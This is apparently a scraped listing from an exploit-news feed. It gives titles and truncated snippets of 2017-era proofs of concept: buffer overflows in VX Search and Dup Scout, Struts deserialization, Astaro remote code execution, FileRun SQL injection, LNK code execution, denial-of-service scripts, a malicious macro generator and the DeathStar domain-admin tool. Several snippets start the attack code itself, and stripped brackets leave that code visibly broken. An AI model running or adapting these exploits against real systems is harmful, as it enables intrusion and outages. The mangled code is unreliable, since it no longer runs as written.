UEFI Firmware Parser

The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials. Installation This module is includ...

Dnsmasq < 2.78 - Information Leak Exploit

Exploit for multiple platform in category dos / poc ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup...

FileRun 2017.09.18 SQL Injection

!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...

Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)

!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...

Apache &lt; 2.2.34 / &lt; 2.4.27 - OPTIONS Memory Leak

!/usr/bin/env python3 Optionsbleed proof of concept test by Hanno Böck import argparse import urllib3 import re def testbleedurl, args: r = pool.request'OPTIONS', url try: allow = strr.headers"Allow" except KeyError: return False if allow in dup: return dup.appendallow if allow == "": print"empty...

Astaro Security Gateway 7 - Remote Code Execution

Astaro Security Gateway 7 - Remote Code Execution !/usr/bin/python Astaro Security Gateway v7 - Unauthenticated Remote Code Execution Exploit Authors: Jakub Palaczynski and Maciej Grabiec Tested on versions: 7.500 and 7.506 Date: 13.12.2016 Vendor Homepage: https://www.sophos.com/ CVE:...

Exploit for Deserialization of Untrusted Data in Apache Struts

apache-struts-pwn - CVE-2017-9805 Exploit ============ An...

Exploit for Deserialization of Untrusted Data in Apache Struts

struts-pwn - CVE-2017-9805 Exploit ============ An exploi...

Tor: [rt.torproject.org] No Rate Limitting on Login Form

Vulnerability description not provided...

VX Search Enterprise 10.0.14 Buffer Overflow

!/usr/bin/env python Exploit Title : VX Search Enterprise v10.0.14 Remote Buffer Overflow CVE-2017-13708 Discovery by : Anurag Srivastava and Nipun Jaswal Credtis : Team Pyramid Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 26/08/2017 Software Link :...

Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow (SEH)

Dup Scout Enterprise 9.9.14 - Remote Buffer Overflow SEH !/usr/bin/env python Exploit Title: Dup Scout Enterprise v 9.9.14 Date: 2017-08-25 Exploit Author: Nipun Jaswal & Anurag Srivastava Author Homepage: www.pyramidcyber.com Vendor Homepage: http://www.dupscout.com Software Link:...

VX Search Enterprise 9.9.12 - &#039;Import Command&#039; Local Buffer Overflow

!/usr/bin/python Exploit Title : VX Search Enterprise v9.9.12 - 'Import Command' Buffer Overflow Discovery by : Anurag Srivastava Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 22/08/2017 Software Link :...

The Malicious Macro Generator!

PenTestIT RSS Feed I'm sure you remember my older post about the malicious office document generator and the office exploitation toolkit. Just a refresher - Luckystrike is the open source script that helps you create malicious Microsoft Office documents using PowerShell and MicroSploit is an open...

Automate Getting Domain Admin Using Empire: DeathStar

DeathStar is a Python script that uses Empire’s RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. Installation Currently, for Death Star to work you’re going to have to install byt3bl33d3r’s fork of Empire until this pull request...

Tomabo MP4 Converter 3.19.15 - Denial of Service Exploit

Exploit for windows platform in category dos / poc !/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CV...

Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)

Internet Download Manager 6.28 Build 17 - Local Buffer Overflow SEH Unicode !/usr/bin/python Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' SEH Buffer Overflow Unicode Date: 14-06-2017 Exploit Author: f3ci Tested on: Windows 7 SP1 x86 How to exploit: Open IDM - Downloads -...

Tomabo MP4 Converter 3.19.15 - Denial of Service

Tomabo MP4 Converter 3.19.15 - Denial of Service !/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE ...

Tomabo MP4 Converter 3.19.15 - Denial of Service

!/usr/bin/python Exploit Title: Tomabo MP4 Converter DOS Date: 13/08/17 Exploit Author: Andy Bowden Vendor Homepage: http://www.tomabo.com/ Software Link: http://www.tomabo.com/mp4-converter/index.html Version: 3.19.15 Tested on: Windows 7 x86 CVE : None Generate a .m3u file using the python scri...

Microsoft Windows - .LNK Shortcut File Code Execution

Microsoft Windows - .LNK Shortcut File Code Execution !/usr/bin/python -- coding: utf-8 -- Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability CVE : 2017-8464 Authors : ykoster, nixawk Notice : Only for educational purposes. Support : python2 import struct def generateSHELLLINKHEADER:...

Microsoft Windows - &#039;.LNK&#039; Shortcut File Code Execution

!/usr/bin/python -- coding: utf-8 -- Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability CVE : 2017-8464 Authors : ykoster, nixawk Notice : Only for educational purposes. Support : python2 import struct def generateSHELLLINKHEADER: | | | | | | | | | | | | | | | | | | | | | | | | | | |...